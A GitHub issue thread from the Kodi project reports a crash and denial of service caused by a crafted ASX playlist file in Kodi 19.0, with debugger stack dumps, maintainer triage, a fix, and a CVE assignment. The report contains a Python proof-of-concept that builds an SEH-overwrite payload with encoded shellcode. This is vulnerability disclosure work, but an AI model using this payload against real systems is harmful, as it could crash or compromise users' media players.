Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Kodi v19.0 Buffer Overflow #20305

Closed
1 task
haxpunk1337 opened this issue Oct 12, 2021 · 23 comments · Fixed by #20306
Closed
1 task

Kodi v19.0 Buffer Overflow #20305

haxpunk1337 opened this issue Oct 12, 2021 · 23 comments · Fixed by #20306

Comments

@haxpunk1337
Copy link

Bug report

Describe the bug

The attached ASX FILE causes a crash in Kodi v19.0 on Windows 10. To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following:

Thread 65E4 exit
Thread E18 exit
Thread E14 exit
Breakpoint at 00007FFB6E343005 set!
INT3 breakpoint at ucrtbase.00007FFB6E343005 (00007FFB6E343005)!
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000

Expected Behavior

Should display file type not supported or unable to open file

Actual Behavior

To Reproduce

Steps to reproduce the behavior:

firstly, close running kodi application

head ='''

<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
junk = "A" * 1975
nseh ="\x42\x61\x21\x61"
seh ="\xa9\x9e\x41\x00"
adjust="\x30\x83\xc0\x0c"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''playlis.wma"/>

'''
payload=head+junk+nseh+seh+adjust+shellcode+junk
+foot

fobj = open("poc.asx","w")
fobj.write(payload)
fobj.close()


poc.asx is generated

now open with kodi . it will take hrs to open kodi .on some cases it crash
poc.zip

##Debug

000000E0BFF4D5C8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5D0 000000E0BFF4DB00
000000E0BFF4D5D8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5E0 000000E0BFF4DA60 &"Error null (0) or unexpected EOF found in input stream."
000000E0BFF4D5E8 00007FF6239DAD4D return to kodi.00007FF6239DAD4D from kodi.00007FF6252B641F
000000E0BFF4D5F0 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5F8 00007FFB6E34C001 ucrtbase.00007FFB6E34C001
000000E0BFF4D600 0000000000000052
000000E0BFF4D608 000000E0BFF4D900 &"¸YK%ö\x7F"
000000E0BFF4D610 000000000000001E
000000E0BFF4D618 0000000000000000
000000E0BFF4D620 0000000000000015
000000E0BFF4D628 0000021CBDAC1600
000000E0BFF4D630 00007FF62549D580 kodi.00007FF62549D580
000000E0BFF4D638 0000021CBDAC16A0 &"pt*%ö\x7F"
000000E0BFF4DC10 0000021CBDD71F10 "<ASX version="3.0">\r\n\r\n<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
000000E0BFF4DC18 0001000000000000
000000E0BFF4DC20 0000021CBF7D10A0
000000E0BFF4DC28 00000000BDA60930
000000E0BFF4DC30 00007FF6254B59B0 kodi.00007FF6254B59B0
000000E0BFF4DC38 0000000000000000
000000E0BFF4DC40 0000000000000000
000000E0BFF4DC48 00007FFB00000201
000000E0BFF4DC50 0000000000000006
000000E0BFF4DC58 0000000000000000
000000E0BFF4DC60 0000000000000000
000000E0BFF4DC68 0000000000000000
000000E0BFF4DC70 0000021CBF26F230
000000E0BFF4DC78 000000E0BFF4DBA0 "0YK%ö\x7F"
000000E0BFF4DC80 0000000000000000
000000E0BFF4DC88 0000000000000020
000000E0BFF4DC90 0000021CBF706200 "C:\Users\THINKPAD\Desktop\"
000000E0BFF4DC98 0000000000000000
000000E0BFF4DCA0 0000000000000000
000000E0BFF4DCA8 000000000000000F
000000E0BFF4DCB0 000006988439F3AC
000000E0BFF4DCB8 00007FFB70C347CD return to ntdll.00007FFB70C347CD from ntdll.00007FFB70C34880
000000E0BFF4DCC0 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DCC8 0000021CB4C59AC0
000000E0BFF4DCD0 000000E0BFF4DD89
000000E0BFF4DCD8 00007FF623CF1D19 return to kodi.00007FF623CF1D19 from ???
000000E0BFF4DCE0 0000021CB4C59AC0
000000E0BFF4DCE8 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF0 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4DD00 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD08 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DD10 0000000000000000
000000E0BFF4DD18 0000000000000000
000000E0BFF4DD20 0000021CB4C59AC0
000000E0BFF4DD28 00007FF623A687D5 return to kodi.00007FF623A687D5 from kodi.00007FF6252ADB30
000000E0BFF4DD30 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD38 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DD40 0000000000000000
000000E0BFF4DD48 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4DD50 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DD58 0000021CB4C59AC0
000000E0BFF4DD60 0000021C00000000
000000E0BFF4DD68 00007FF623E5964B return to kodi.00007FF623E5964B from kodi.00007FF6252ADB30
000000E0BFF4DD70 000000E0BFF4DE80
000000E0BFF4DD78 0000000000000013
000000E0BFF4DD80 FFFFFFFFFFFFFFFE
000000E0BFF4DD88 0000021CBDA60930 "C:\Users\THINKPAD\Desktop\poc.asx"
000000E0BFF4DD90 0000021CB4AB0100
000000E0BFF4DD98 0000000000000021
000000E0BFF4DDA0 000000000000002F
000000E0BFF4DDA8 000006988439F42C
000000E0BFF4DDB0 0000000000000000
000000E0BFF4DDB8 0000000000000000
000000E0BFF4DDC0 000000E0BFF4EB78
000000E0BFF4DDC8 0000000000000000
000000E0BFF4DDD0 0000021CB6CA4D10 &" ;Ã#ö\x7F"
000000E0BFF4DDD8 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DDE0 000000E0BFF4DEF0
000000E0BFF4DDE8 00007FF623C33FEF return to kodi.00007FF623C33FEF from kodi.00007FF623CF1C60
000000E0BFF4DDF0 0000021CB4AB0100
000000E0BFF4DDF8 0000021CBF797C50
000000E0BFF4DE00 0000000000000000
000000E0BFF4DE08 0000000000000000
000000E0BFF4DE10 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DE18 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4DE20 0000021CB4AB0100
000000E0BFF4DE28 0000021CBF797E90
000000E0BFF4DE30 0000000000000000
000000E0BFF4DE38 0000000000000000
000000E0BFF4DE40 0000021CB4AB0000
000000E0BFF4DE48 0000000000000000
000000E0BFF4DE50 FFFFFFFFFFFFFFFE
000000E0BFF4DE58 00007FFB70C358D1 return to ntdll.00007FFB70C358D1 from ntdll.00007FFB70C34FE0
000000E0BFF4DE60 0000021CB4AB0340
000000E0BFF4DE68 FFFFFFFFFFFFFFFE
000000E0BFF4DE70 0000000000000003
000000E0BFF4DE78 0000021CBF523000
000000E0BFF4DE80 0000000000000008
000000E0BFF4DE88 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DE90 0000000000000000
000000E0BFF4DE98 000000E0BFF4E0F0 "ŒÈ9„˜\x06"
000000E0BFF4DEA0 0000000000000000
000000E0BFF4DEA8 0000000000000000
000000E0BFF4DEB0 0000000000000003
000000E0BFF4DEB8 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DEC0 0000021CBF3CAC88 "nd descriptors.\n\n Usage:\n\n class C(metaclass=ABCMeta):\n @AbstractMethod\n def my_abstract_method(self, ...):\n ...\n "
000000E0BFF4DEC8 0000000000000001
000000E0BFF4DED0 000006988439F6EC
000000E0BFF4DED8 0000000000000001
000000E0BFF4DEE0 0000000000000000
000000E0BFF4DEE8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF0 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF8 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF00 00000000FFFFFFFF
000000E0BFF4DF08 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF10 000000E0BFF4E020 "¼÷9„˜\x06"
000000E0BFF4DF18 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4DF20 0000000000000000
000000E0BFF4DF28 0000000000000000
000000E0BFF4DF30 00007FF6255DB960 kodi.00007FF6255DB960
000000E0BFF4DF38 0000000000000000
000000E0BFF4DF40 0000021CBF600DA0 "ÝÌÝÌ"
000000E0BFF4DF48 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF50 0000021CB4AB0340
000000E0BFF4DF58 00007FFB007000C0
000000E0BFF4DF60 0000021CBF797910
000000E0BFF4DF68 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF70 0000021CB4AB0100
000000E0BFF4DF78 0000021CBF0D4AC0
000000E0BFF4DF80 FFFFFFFFFFFFFFFE
000000E0BFF4DF88 FFFFFFFFFFFFFFFE
000000E0BFF4DF90 0000021CB4AB0000
000000E0BFF4DF98 0000000000000000
000000E0BFF4DFA0 0000021CBF001A80 "ÝÌÝÌ"
000000E0BFF4DFA8 FFFFFFFFFFFFFFFE
000000E0BFF4DFB0 000006988439FCFC
000000E0BFF4DFB8 0000021C004002A0
000000E0BFF4DFC0 0000000000000000
000000E0BFF4DFC8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFD0 00000000000002B8
000000E0BFF4DFD8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFE0 0000021CB85729A0
000000E0BFF4DFE8 0000021CBD0A9840 &" <\r$ö\x7F"
000000E0BFF4DFF0 000000E0BFF4E089 "æô¿à"
000000E0BFF4DFF8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E000 000006988439F79C
000000E0BFF4E008 00007FFB70C348D0 return to ntdll.00007FFB70C348D0 from ntdll.00007FFB70C35710
000000E0BFF4E010 0000021CBD0D26D0
000000E0BFF4E018 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E020 000006988439F7BC
000000E0BFF4E028 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E030 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E038 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E040 000006988439F7EC
000000E0BFF4E048 0000021CB69C48D0 &"0«¥#ö\x7F"
000000E0BFF4E050 0000000000000000
000000E0BFF4E058 0000000000000000
000000E0BFF4E060 0000000000000000
000000E0BFF4E068 FFFFFFFFFFFFFFFE
000000E0BFF4E070 FFFFFFFFFFFFFFFE
000000E0BFF4E078 0000021CB4C34800
000000E0BFF4E080 00000000FFFFFFFF
000000E0BFF4E088 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4E090 0000021CBDFB4C00 "Thread %s %s terminating (autodelete)"
000000E0BFF4E098 00007FF623FC38D5 return to kodi.00007FF623FC38D5 from kodi.00007FF6252ADB30
000000E0BFF4E0A0 0000000000000000
000000E0BFF4E0A8 000000000000000F
000000E0BFF4E0B0 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4E0B8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4E0C0 0000021CBD0AA230
000000E0BFF4E0C8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E0D0 000006988439C8EC
000000E0BFF4E0D8 0000021CB85729A0
000000E0BFF4E0E0 000006988439C8FC
000000E0BFF4E0E8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E0F0 000006988439C88C
000000E0BFF4E0F8 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E100 0000000000000000
000000E0BFF4E108 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E110 0000021CBDFB4A00 "profile/Database/MyMusic82.db"
000000E0BFF4E118 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E120 0000000000000000
000000E0BFF4E128 000000000000000F
000000E0BFF4E130 000000E0BFF4E240
000000E0BFF4E138 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4E140 000000E0BFF4E201
000000E0BFF4E148 00007FF623C273E1 return to kodi.00007FF623C273E1 from kodi.00007FF6252ADB30
000000E0BFF4E150 00007FF6255193F0 kodi.00007FF6255193F0
000000E0BFF4E158 0000021C00000000
000000E0BFF4E160 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E168 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E170 FFFFFFFFFFFFFFFE
000000E0BFF4E178 FFFFFFFFFFFFFFFE
000000E0BFF4E180 000006988439C81C
000000E0BFF4E188 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E190 0000021CBD20A8F0 "àž_%ö\x7F"
000000E0BFF4E198 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000
000000E0BFF4F808 0000000000000000
000000E0BFF4F810 0000000000000000
000000E0BFF4F818 0000000000000000
000000E0BFF4F820 0000000000000000
000000E0BFF4F828 0000000000000000
000000E0BFF4F830 0000000000000000
000000E0BFF4F838 0000000000000000
000000E0BFF4F840 000004E8FFFFFB30
000000E0BFF4F848 000004D0FFFFFB30
000000E0BFF4F850 0000000000000019
000000E0BFF4F858 0000000000000000
000000E0BFF4F860 0000000000000000
000000E0BFF4F868 0000000000000000
000000E0BFF4F870 0000000000000000
000000E0BFF4F878 0000000000000000
000000E0BFF4F880 0000000000000000
000000E0BFF4F888 0000000000000000
000000E0BFF4F890 0000000000000000
000000E0BFF4F898 0000000000000000
000000E0BFF4F8A0 0000000000000000
000000E0BFF4F8A8 0000000000000000
000000E0BFF4F8B0 0000000000000000
000000E0BFF4F8B8 0000000000000000
000000E0BFF4F8C0 0000000000000000
000000E0BFF4F8C8 0000000000000000
000000E0BFF4F8D0 0000000000000000
000000E0BFF4F8D8 0000000000000000
000000E0BFF4F8E0 0000000000000000
000000E0BFF4F8E8 0000000000000000
000000E0BFF4F8F0 0000000000000000
000000E0BFF4F8F8 0000000000000000
000000E0BFF4F900 0000000000000000
000000E0BFF4F908 0000000000000000
000000E0BFF4F910 0000000000000000
000000E0BFF4F918 0000000000000000

Your Environment

Used Operating system:

  • Windows 10 * 64

  • Operating system version/name:

  • Kodi version: 19.0

note: Once the issue is made we require you to update it with new information or Kodi versions should that be required.
Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.

@haxpunk1337
Copy link
Author

tried with other extensions too. it runs efficiently,

fuzzard pushed a commit to fuzzard/xbmc that referenced this issue Oct 12, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@fuzzard
Copy link
Contributor

fuzzard commented Oct 12, 2021

Would you mind trying the following as a possible fix fuzzard@80c8138

@haxpunk1337
Copy link
Author

i think its working fine :)

@haxpunk1337
Copy link
Author

Hi Team,

is this eligible for CVE ?

Thank YOU

@basilgello
Copy link
Collaborator

is this eligible for CVE ?

Yes

@haxpunk1337
Copy link
Author

haxpunk1337 commented Oct 15, 2021 via email

@basilgello
Copy link
Collaborator

I ran your PoC under Debian 12 with debug symbols and it seems that TinyXML iterates back and forth in https://salsa.debian.org/debian/tinyxml/-/blob/master/tinyxmlparser.cpp#L903 Though no memory corruption seen after 1h. It is a definitely a DoS, but if you can send the DrWatson crash logs, we can check if it can lead to more severe rank.

@haxpunk1337
Copy link
Author

haxpunk1337 commented Oct 15, 2021 via email

@basilgello
Copy link
Collaborator

Great, so you observe breakpoint exception (80000003) Good ol' times :)

Did you encounter c000005 (MEMORY_ACCESS_VIOLATION) with your PoC?

@haxpunk1337
Copy link
Author

haxpunk1337 commented Oct 15, 2021 via email

@basilgello
Copy link
Collaborator

i didn't encounter any memory access violations :(

It's still a great find! I am just trying to undersrand if we need backporting this fix to 18.x and 17.x :) Access violation that leads to RCE must be ported ASAP.

@haxpunk1337
Copy link
Author

Hi Team,

I think I found another issue:

Kodi is not able to praise or load folder which consists malicious crafted .asx file which leads to application-level DoS

Test case

i have created a .asx file on poc folder.
i was able to navigate all folder except POC folder

pocvideo.zip

Noted that memory consumption was very high

unnamed

Stack Trace:
0000092d08ff7f0 00007ff7c3c3b503 : 00000258432a6e98 000002584325b410 0000000000000001 0000000000000000 : kodi+0x1be56f
00000092d08ff880 00007ff7c550dd3e : 0000000000000005 0000000000000000 0000000000000000 0000000000000000 : kodi+0x1ab503
00000092d08ffbf0 00007ffc7ae17034 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : kodi!process_jpeg+0x144244e
00000092d08ffc30 00007ffc7bca2651 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : kernel32!BaseThreadInitThunk+0x14
00000092d08ffc60 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : ntdll!RtlUserThreadStart+0x21

STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_NAME: kodi!process_jpeg+190b3f

MODULE_NAME: kodi

IMAGE_NAME: kodi.exe

FAILURE_BUCKET_ID: BREAKPOINT_80000003_kodi.exe!process_jpeg

OS_VERSION: 10.0.19041.1

Thank You

@haxpunk1337
Copy link
Author

@fuzzard
Copy link
Contributor

fuzzard commented Oct 16, 2021

Whats the repro instructions for this second instance?
Is this already solved with the proposed PR fix?

@basilgello
Copy link
Collaborator

@fuzzard it is likely a JPEG thumbnailer issue...

@fuzzard
Copy link
Contributor

fuzzard commented Oct 16, 2021

I ask because he says an asx file on poc folder. The zip is just an animated gif. Cant repro an issue on my end, hence the exact repro instructions

@haxpunk1337
Copy link
Author

@fuzzard
Copy link
Contributor

fuzzard commented Oct 16, 2021

Thats the original PoC you provided isnt it? so whats the second issue?

Or is it you just saying when that is in a folder, and you view the folder it has the same effect as trying to open the asx file? If so, thats what i saw when i looked into it, and my proposed PR resolves that issue.

@haxpunk1337
Copy link
Author

when that is in a folder, and view the folder it has the same effect as trying to open the asx file.. likely a JPEG thumbnailer issue which is affecting kodi!process_jpeg+190b3f

@fuzzard
Copy link
Contributor

fuzzard commented Oct 16, 2021

Is it an issue when used with the following PR applied? #20306

Im just trying to understand if something else is required here, or if its already fixed with that PR.

fuzzard pushed a commit to fuzzard/xbmc that referenced this issue Oct 17, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@haxpunk1337
Copy link
Author

haxpunk1337 commented Oct 20, 2021 via email

@basilgello
Copy link
Collaborator

basilgello commented Oct 20, 2021

@haxpunk1337 Assigning a CVE is MITRE's job, not ours. Did you apply for CVE here: https://www.cve.org/ResourcesSupport/ReportRequest#RequestCVEID ?

As I told, this is a DoS bug which qualifies for CVE.

If by CVE you mean bug bounty this time, I think it's time to open the security page on Kodi website!

UPD: Previously it was a single form to submit a CVE on MITRE site, now they changed the workflow :(

graysky2 pushed a commit to graysky2/xbmc that referenced this issue Oct 23, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@haxpunk1337
Copy link
Author

CVE is Assigned for this issue:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42917

joseluismarti pushed a commit to joseluismarti/xbmc that referenced this issue Apr 15, 2022
Turn istream into a std::string to handle large buffers (xbmc#20305)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants